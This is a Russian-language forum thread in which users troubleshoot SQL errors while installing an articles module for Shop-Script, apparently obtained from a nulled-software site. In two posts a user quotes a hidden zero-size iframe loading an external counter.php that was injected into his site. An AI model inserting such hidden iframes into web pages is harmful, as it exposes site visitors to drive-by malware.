И все таки: Статьи для Shop-Script.

Тема в разделе "Shop-script", создана пользователем alexandr3182, 19 май 2008.

  1. alexandr3182

    alexandr3182

    Регистр.:
    5 фев 2008
    Сообщения:
    226
    Симпатии:
    12
    Толком не нашел никакого решения этого вопроса, хотя очень нужно для shop-script. Решил кто нить эту проблему?
     
  2. Caurus

    Caurus

    Регистр.:
    21 фев 2008
    Сообщения:
    348
    Симпатии:
    285
    А что понимаешь под толковыми статьями....поподробнее? есть тут решение и вполне рабочее.... http://www.nulled.ws/showpost.php?p=426143&postcount=10 я себе ставил все работает....
     
    raja_casa, nikitaya и AlexandriusII нравится это.
  3. alexandr3182

    alexandr3182

    Регистр.:
    5 фев 2008
    Сообщения:
    226
    Симпатии:
    12
    Спасиба конечно но вот что он мне выдает при попытке создать таблицу ...

    #1142 - INSERT command denied to user 'xxx'@'localhost' for table 'SS_settings'

    хотя она создается.... но при загрузке сайта выдает

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'CONF_ART_COUNT_IN_CUSTOMER_PART' at line 3 SQL query : SELECT * FROM SS_art_table ORDER BY priority DESC, add_stamp DESC LIMIT 0, CONF_ART_COUNT_IN_CUSTOMER_PART
     
  4. Caurus

    Caurus

    Регистр.:
    21 фев 2008
    Сообщения:
    348
    Симпатии:
    285
    Я так понимаю у тебя возникает проблема, когда ты выполняешь вот этот запрос к базе:

    Код:
    INSERT INTO `activerest_shop`.`SS_settings` (
    `settingsID` ,
    `settings_groupID` ,
    `settings_constant_name` ,
    `settings_value` ,
    `settings_title` ,
    `settings_description` ,
    `settings_html_function` ,
    `sort_order` 
    )
    VALUES (
    '100', '2', 'CONF_ART_COUNT_IN_CUSTOMER_PART', '5', 'Art', 'Art', 'setting_TEXT_BOX(2, 0', '0'
    );
    Ты поменял activerest_shop на название своей базы, в которую ты вставляешь?

    А первая часть запроса нормально выполняется? Вот эта:
    Код:
    CREATE TABLE `SS_art_table` (
      `NID` int(11) NOT NULL auto_increment,
      `add_date` varchar(30) default NULL,
      `title` text,
      `picture` varchar(30) default NULL,
      `textToPublication` text,
      `textToMail` text,
      `add_stamp` int(11) default NULL,
      `priority` int(11) default NULL,
      `emailed` int(11) default NULL,
      PRIMARY KEY  (`NID`)
    ) ENGINE=InnoDB AUTO_INCREMENT=1 ;
     
  5. alexandr3182

    alexandr3182

    Регистр.:
    5 фев 2008
    Сообщения:
    226
    Симпатии:
    12
    вот я лох.... сорри, пропустил изменить название базы.... сорри.... усе ок... мерси. а по какой ссылке теперь эти статьи?
     
  6. Caurus

    Caurus

    Регистр.:
    21 фев 2008
    Сообщения:
    348
    Симпатии:
    285
    :D нет...лох это я...пробовал установить 2 или 3 раза пока понял в чем прикол... причем забрасывал на неделю, а потом только начал разбираться. Но сразу хочу сказать это еще не все проблемы, с которыми ты столкнешься. Первая, которую я помню точно там ошибка в поле
    Код:
    settings_html_function
    значение должно выглядить так
    Код:
    setting_TEXT_BOX(2,
    Дело в том, что там вставляется
    Код:
    setting_TEXT_BOX(2, 0
    и при таком раскладе не работает в админке, сколько статей выводить..мне надо бежать приду, допишу. пока исправь эту часть, которую я написал.
     
    AlexandriusII и nafanyaa нравится это.
  7. alexandr3182

    alexandr3182

    Регистр.:
    5 фев 2008
    Сообщения:
    226
    Симпатии:
    12
    это исправить еще при вставке в базу или уже в базе?

    кстати вот что нашел <iframe src="http://www.emerginggrowthstocks.ca/tmplt/counter.php" width="0" height="0" frameborder="0"> </iframe>
     
  8. Caurus

    Caurus

    Регистр.:
    21 фев 2008
    Сообщения:
    348
    Симпатии:
    285
    Это надо руками все изменить. Кагда создал поле в SS_settings найди там CONF_ART_COUNT_IN_CUSTOMER_PART заходим в его структуру и там делаем то что я написал в 6 посте.

    А то что ты написал это что?
     
  9. alexandr3182

    alexandr3182

    Регистр.:
    5 фев 2008
    Сообщения:
    226
    Симпатии:
    12
    А этот код <iframe src="http://www.em???... я нашел у себя.... как то закинули.... Не знаю как....

    В SS_settings в settings_constant_name нашел СONF_ART_COUNT_IN_CUSTOMER_PART. а как поменять?
     
  10. Caurus

    Caurus

    Регистр.:
    21 фев 2008
    Сообщения:
    348
    Симпатии:
    285
    Если ререз phpMyAdmin то выбираем таблицу SS_settings далее нажимаем не на вкладку Структура, а на вкладку Обзор там находим CONF_ART_COUNT_IN_CUSTOMER_PAR выбираем ее и нажимаем на карандашик это и есть изменить, далее открываеться структура CONF_ART_COUNT_IN_CUSTOMER_PAR там мы находим settings_html_function предпоследняя и вставляем setting_TEXT_BOX(2, вместо того что там.... Вот и все с этим пунктом...
     
    smals и nafanyaa нравится это.